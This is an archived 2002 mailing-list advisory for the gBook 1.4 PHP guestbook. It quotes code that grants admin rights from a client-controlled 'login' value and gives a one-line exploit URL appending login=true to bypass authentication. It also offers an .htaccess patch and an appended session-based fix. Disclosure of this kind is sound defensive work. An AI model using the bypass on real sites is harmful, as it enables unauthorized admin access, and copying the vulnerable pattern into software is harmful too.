gBook

From: Frog Man (leseulfrogat_private)
Date: Tue Oct 22 2002 - 13:28:49 PDT


    Information :
    °°°°°°°°°°°°°°
    Language : PHP
    Tested version : 1.4
    Problem : Admin access
    
    PHP Code :
    °°°°°°°°°°
    /gb/index.php :
    ------------------------------------------------------
    <?php
    include("config.inc.php");
    if($action == "login") {
    	if($user == $loginu && $pw == $loginpw)
    	{
    		setcookie("login", "true", time()+3600);
    		header("location: index.php");
    	}
    	else
    	{
    		setcookie("login", "false", -3600);
    		header("location: index.php?fehler=login");
    	}
    }
    ?>
    [...]
    <?php
    if($login == "true")
    {
    [ADMIN CODE]
    [...]
    ------------------------------------------------------
    
    Exploit :
    °°°°°°°°°
    http://[Target]/gb/index.php?login=true
    
    Patch :
    °°°°°°°
    Use of .htaccess.
    
    More details in French :
    http://www.frog-man.org/tutos/gBook.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
    
    frog-m@n
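
The admin check in the excerpt trusts `$login`, a value the client supplies: under register_globals it can arrive in the query string, and the `login` cookie is itself client-controlled. The following is an added example, not gBook's code and not part of the original post, that keeps the admin flag in the server-side session instead. The session key `gb_admin`, the two helper functions and the use of POST for the login form are assumptions.

```php
<?php
// Added example, not gBook's code. $loginu / $loginpw are the names the
// excerpt reads from config.inc.php; 'gb_admin' and both helpers are hypothetical.
declare(strict_types=1);

/** Compare submitted credentials with the configured ones in constant time. */
function gb_check_credentials(string $user, string $pw, string $loginu, string $loginpw): bool
{
    // Run both comparisons so timing does not show which field was wrong.
    $userOk = hash_equals($loginu, $user);
    $pwOk   = hash_equals($loginpw, $pw);
    return $userOk && $pwOk;
}

/** Admin state is read only from the server-side session array. */
function gb_is_admin(array $session): bool
{
    return ($session['gb_admin'] ?? false) === true;
}

if (PHP_SAPI === 'cli') {
    // Offline self-check with constructed values: an empty session is never
    // admin, whatever the query string or cookies contain.
    var_dump(gb_is_admin([]), gb_is_admin(['gb_admin' => 'true']));
    var_dump(gb_check_credentials('admin', 'guess', 'admin', 'constructed-pw'));
    exit;
}

include 'config.inc.php';                 // defines $loginu and $loginpw
session_start();

if (($_POST['action'] ?? '') === 'login') {
    // Read the form fields explicitly; reject non-string (array) input.
    $user = is_string($_POST['user'] ?? null) ? $_POST['user'] : '';
    $pw   = is_string($_POST['pw'] ?? null) ? $_POST['pw'] : '';
    if (gb_check_credentials($user, $pw, $loginu, $loginpw)) {
        session_regenerate_id(true);      // fresh session id on privilege change
        $_SESSION['gb_admin'] = true;
        header('Location: index.php');
    } else {
        unset($_SESSION['gb_admin']);
        header('Location: index.php?fehler=login');
    }
    exit;
}

if (gb_is_admin($_SESSION)) {
    // [ADMIN CODE] from the excerpt goes here
}
```

Because the browser only holds an opaque session identifier, neither a `login=true` parameter nor a hand-set cookie changes what `gb_is_admin()` returns.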
    
    



    This archive was generated by hypermail 2b30 : Tue Oct 22 2002 - 15:26:34 PDT